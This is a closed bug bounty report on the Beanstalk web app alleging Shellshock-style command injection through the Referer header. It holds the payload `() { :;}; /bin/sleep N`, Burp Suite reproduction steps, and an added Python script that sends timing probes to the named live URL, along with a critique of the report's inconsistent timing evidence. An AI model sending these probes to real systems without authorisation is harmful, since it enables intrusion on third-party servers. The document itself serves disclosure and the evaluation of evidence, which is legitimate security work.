Beanstalk Notion

Report #34606

Report Date
August 17, 2024
Status
Closed
Payout

Code injection in Referer header

Report Info

Report ID

#34606

Report type

Websites and Applications

Has PoC?

Yes

Target

https://app.bean.money

Impacts

Application appears to evaluate user input as code

Description

The application appears to evaluate user input as code. A payload instructing the server to sleep for 0 seconds produced a response time of 4.027 seconds; a payload instructing it to sleep for 10 seconds produced a response time of 13.217 seconds.

Vulnerability Details

The payload placed in the Referer header, `() { :;}; /bin/sleep N`, is a bash function-definition string in the style of Shellshock (CVE-2014-6271): a vulnerable bash that imports the header value through an environment variable (for example via CGI) parses the empty function `() { :;}` and then executes the trailing command. If the header is not handed to such a bash, the string is inert and no delay is introduced.

The evidence offered is a single pair of timing measurements: 4.027 seconds with `/bin/sleep 0` and 13.217 seconds with the longer sleep. Two things a reviewer should note before treating this as confirmed code execution. First, the report is inconsistent about the second payload: the description says 10 seconds, the proof of concept says 11. Second, the observed difference is about 9.2 seconds, which matches neither value exactly, and the 4-second baseline for a static manifest.json request suggests considerable network or server jitter. A single request per arm cannot separate an injected delay from that jitter; repeated, interleaved samples with a delay that scales with the requested sleep are needed to make the claim conclusive. The report does not include such repeated measurements.

Impact Details

  • Remote Code Execution (RCE): attackers could inject and execute arbitrary commands on the server.

  • Data breach: if the injected code can reach the database or file system, sensitive data could be leaked.

  • Network lateral movement: if the server is part of a larger network, the injected code could be used to move laterally within it.

  • Financial fraud: since the application handles financial transactions, injected code could be used to manipulate transaction data.

  • Reputation damage: public disclosure of a code injection vulnerability, especially if exploited, could severely damage the company's reputation.

Proof of concept

  • In the browser: with Burp Suite set as the proxy, visit https://app.bean.money/manifest.json so that Burp intercepts the request.

  • In Burp Suite: intercept the request and send it to Repeater.

  • Modify the request: add the HTTP header `Referer: () { :;}; /bin/sleep 0`.

  • Send the modified request and note the response time of 4.027 seconds.

  • Back in Repeater: change the Referer header value to `() { :;}; /bin/sleep 11`, send the request, and note the response time of 13.217 seconds.
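The following script is an added example for this report, not the reporter's or Beanstalk's code. It builds the same Shellshock-style Referer payload, and replaces the single-measurement comparison above with the check a reviewer would want: several interleaved samples per arm, medians instead of single values, and a verdict that requires the delay to match the requested sleep within a tolerance and to exceed the endpoint's natural jitter. The probe URL `https://app.bean.money/manifest.json`, the sample sizes and the tolerance are my assumptions; the offline demo uses constructed timing data rather than the report's, since the report gives only one sample per arm.

```python
"""Timing-based check for a Shellshock-style header injection.

Added example for this report (not the reporter's or the project's code).
Assumptions not taken from the report: the probe URL below, the sample
sizes, and the 25% tolerance used for the verdict.
"""
import statistics
import time
import urllib.error
import urllib.request

TARGET = "https://app.bean.money/manifest.json"  # assumed probe URL


def shellshock_referer(sleep_seconds: int) -> str:
    """Build the payload used in the report.

    `() { :;};` is an empty bash function definition. A bash that imports the
    header through an environment variable (CVE-2014-6271) parses it and then
    runs the trailing command; anything else treats the string as inert text.
    """
    return f"() {{ :;}}; /bin/sleep {sleep_seconds}"


def timed_request(url: str, referer: str, timeout: float = 60.0) -> float:
    """Send one GET with the given Referer and return wall-clock seconds.

    Uses the network; the offline demo below never calls it.
    A 4xx/5xx still measures how long the server took, so it is not an error.
    """
    req = urllib.request.Request(
        url, headers={"Referer": referer, "User-Agent": "timing-probe"}
    )
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass
    return time.perf_counter() - start


def sleep_injection_verdict(baseline, injected, requested_delay, tolerance=0.25):
    """Decide whether `injected` is delayed by `requested_delay` seconds.

    Medians make one slow sample harmless. The delta must fall within
    `tolerance` of the requested sleep and exceed the spread of the baseline
    samples, otherwise ordinary jitter (like a 4 s static-file response)
    could be mistaken for an injected sleep. Returns (confirmed, delta).
    """
    if len(baseline) < 3 or len(injected) < 3:
        raise ValueError("need at least 3 samples per arm; one pair is not evidence")
    delta = statistics.median(injected) - statistics.median(baseline)
    jitter = max(baseline) - min(baseline)
    lower = requested_delay * (1 - tolerance)
    upper = requested_delay * (1 + tolerance)
    confirmed = lower <= delta <= upper and delta > jitter
    return confirmed, delta


def probe_live(url: str, requested_delay: int, samples: int = 5):
    """Collect interleaved baseline/injected samples and return the verdict.

    Interleaving the two arms guards against the server getting slower or
    faster over the course of the test. Network access required.
    """
    baseline, injected = [], []
    for _ in range(samples):
        baseline.append(timed_request(url, shellshock_referer(0)))
        injected.append(timed_request(url, shellshock_referer(requested_delay)))
    return sleep_injection_verdict(baseline, injected, requested_delay)


def demo():
    """Offline demonstration on constructed samples (nothing is sent)."""
    # Constructed: a fast endpoint that really executes the sleep.
    real = sleep_injection_verdict(
        [0.41, 0.39, 0.45, 0.40], [10.42, 10.39, 10.50, 10.45], requested_delay=10
    )
    # Constructed: a jittery endpoint where one slow response per arm would
    # look like "4 s vs 13 s" if only those two samples were compared.
    noisy = sleep_injection_verdict(
        [4.0, 4.3, 3.9, 9.5, 4.1], [4.2, 13.0, 4.0, 4.4, 4.1], requested_delay=10
    )
    return {"real_injection": real, "noisy_endpoint": noisy}


if __name__ == "__main__":
    for name, (confirmed, delta) in demo().items():
        print(f"{name}: delta={delta:.2f}s confirmed={confirmed}")
```

Run `probe_live(TARGET, 10)` only against a target you are authorised to test; the verdict also benefits from a second run with a different delay (for example 5 seconds), since an injected sleep scales linearly with the requested value while jitter does not.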

Immunefi Response

Immunefi has reviewed this vulnerability report and decided to close it, since it is out of scope for the Beanstalk bug bounty program.
  • claimed impact by the whitehat is not in scope for the bug bounty program
  • claimed asset by the whitehat is in scope for the bug bounty program
  • PoC has been submitted to the project
  • claimed severity is in scope for the bug bounty program

The project will now be automatically subscribed and receive a report of the closed submission and can evaluate if they are interested in re-opening it. However, note that they are not under any obligation to do so.